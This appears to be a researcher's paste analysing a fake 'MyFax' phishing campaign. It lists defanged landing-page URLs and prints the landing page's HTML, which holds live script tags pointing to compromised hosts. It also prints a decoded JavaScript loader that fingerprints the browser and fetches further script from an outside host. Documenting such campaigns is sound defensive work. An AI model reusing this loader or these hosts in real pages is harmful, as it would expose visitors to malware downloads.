Phishing Attempt: docs/new_fax.html no-replay@my-fax.com

1. Phishing Attempt Details
2. Reported by neonprimetime security
3. http://neonprimetime.blogspot.com
4.  
5. ****
6.  
7. Similar to what this blog reported http://blog.dynamoo.com/2015/01/myfax-no-replaymy-faxcom-spam-campaign.html
8.  
9. ****
10.  
11. you see an email from MyFax [[email protected]]
12.  
13. ****
14.  
15. The body contains a link to a url like this that always ends with "docs/new_fax.html"
16.  
17.     hxxp://381main.com/docs/new_fax.html
18.     hxxp://blustoneentertainment.com/docs/new_fax.html
19.     hxxp://claimquest123.com/docs/new_fax.html
20.     hxxp://www.drhousesrl.it/docs/new_fax.html
21.     hxxp://dutawirautama.com/documents/message.html
22.     hxxp://espaceetconfort.free.fr/docs/new_fax.html
23.     hxxp://netsh105951.web13.net-server.de/docs/new_fax.html
24.     hxxp://njstangers.org/docs/new_fax.html
25.     hxxp://patresearch.com/docs/new_fax.html
26.     hxxp://powderroomplayground.com/docs/new_fax.html
27.     hxxp://prosperprogram.org/docs/new_fax.html
28.     hxxp://pyramidautomation.com/docs/new_fax.html
29.     hxxp://raffandraff.com/docs/new_fax.html
30.     hxxp://regimentalblues.co.uk/docs/new_fax.html
31.     hxxp://rewelacja.eu/docs/new_fax.html
32.     hxxp://stamfordicenter.com/docs/new_fax.html
33.     hxxp://stylista.com.cy/docs/new_fax.html
34.     hxxp://win.org.ro/docs/new_fax.html
35.  
36.         NOTE: There are many more urls as this pastebin listed http://pastebin.com/uxgVykUB
37.  
38. ***
39. The body of the new_fax.html always contains
40.  
41.     <!DOCTYPE html>
42.     <html>
43.     <head>
44.       <title>Page Title</title>
45.     <script type="text/javascript" src="http://girardimusicstudio.com/js/jquery-1.7.50.js"></script>
46.     <script type="text/javascript" src="http://blackstonebikes.co.uk/js/jquery-1.7.50.js"></script>
47.    
48.     </head>
49.  
50.     <body>
51.     </body>
52.  
53.     </html>
54.  
55. ***
56.  
57. The 2 javascript files linked are jjencode and depend on the parameters passed also, which when decrypted show either
58.  
59. With no parameters you get something like this
60. (0, 'moved = 0;\nbesend = false;\nfunction get_query() {\n    besend = true;\n
61.   ua = navigator.userAgent;wd = screen.width;hg = screen.height;pl = navigator.p
62. latform;\n    var tmp1 = document.createElement("script"); tmp1.type = "text/jav
63. ascript"; tmp1.async = true;\n    tmp1.src = "http://stylista.com.cy/js/jquery-1
64. .7.50.js?t1=" + ua + "&t2=" + wd + "&t3=" + hg + "&t4=1083747684&t5=" + moved +
65. "&t6=519.js";\n    var tmp2 = document.getElementsByTagName("script")[0];\n    t
66. mp2.parentNode.insertBefore(tmp1, tmp2);\n}\ndocument.onmousemove = function(){m
67. oved = 1;clearTimeout(timeout);if ((!besend)) {get_query();}\n}\ntimeout = setTi
68. meout(function(){if ((!moved) && (!besend))  {get_query();besend = true}}, 20000
69. );')
70.  
71.  
72. With shows you that parameters being passed are
73. t1 = ua = useragent
74. t2 = wg = screen width
75. t3 = hg = screen height
76. t4 = some identifying number
77. t5 = 1 or 0
78. t6 = random javascript file name
79.  
80. If you make calls to that link with parameters you may get random words like these
81.  
82. http://stylista.com.cy/js/jquery-1.7.50.js?t1=Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36&t2=1920&t3=1080&t4=1083747684&t5=1&t6=2964.js (21.06%)
83.  
84. (0, 'document.write("altogether sort prevent take behind list:<li>held itself ag
85. ain prevent kill</li><li>held like again could grunt</li><li>fish poor straighte
86. nin much tight</li><li>some engine doubling again nursing</li><li>arms made whic
87. h words sneezing</li><li>little creature hold carried leave</li><li>some legs li
88. ke engine much</li><li>creature arms like first grunted</li><li>Alice hold which
89. right leave</li><li>legs like that leave time</li>");')
90.  
91. (0, 'document.write("keep undoing away leave behind list:<li>directions engine t
92. hat sure sneezing</li><li>directions steam minute prevent Dont</li><li>like righ
93. t foot loud grunted</li><li>when which this child leave</li><li>straightenin int
94. o knot keep time</li><li>shaped straightenin soon nursing open</li><li>difficult
95. y made take away grunt</li><li>caught queer star much Dont</li>");')
96.  
97. (0, 'document.write("shaped kept itself open this list:<li>when could soon last
98. words</li><li>creature could open behind said</li><li>first then undoing open ki
99. ll</li><li>arms itself minute knot behind</li><li>shaped much proper right dont<
100. /li><li>engine that prevent take this</li><li>some that nursing then child</li><
101. li>queer when this time Dont</li>");')
102.  
103. (0, 'document.write("some just thing left Dont list:<li>little creature carried
104. take this</li><li>some snorting altogether first prevent</li><li>thought itself
105. take sure behind</li><li>queer engine straightenin sure last</li><li>shaped alto
106. gether hold keep dont</li><li>altogether made nursing undoing behind</li><li>som
107. e poor kept that proper</li><li>when minute much nursing prevent</li><li>difficu
108. lty thing proper right murder</li><li>Alice held first away kill</li><li>Alice d
109. irections poor sneezing Dont</li>");')
110.  
111.  
112.  
113. But sometimes depending on the parameters as this blog states
114. https://techhelplist.com/index.php/component/tags/tag/36-fax
115.  
116. You get "Read Message" which gives you the chance to download a malicious file
117. ****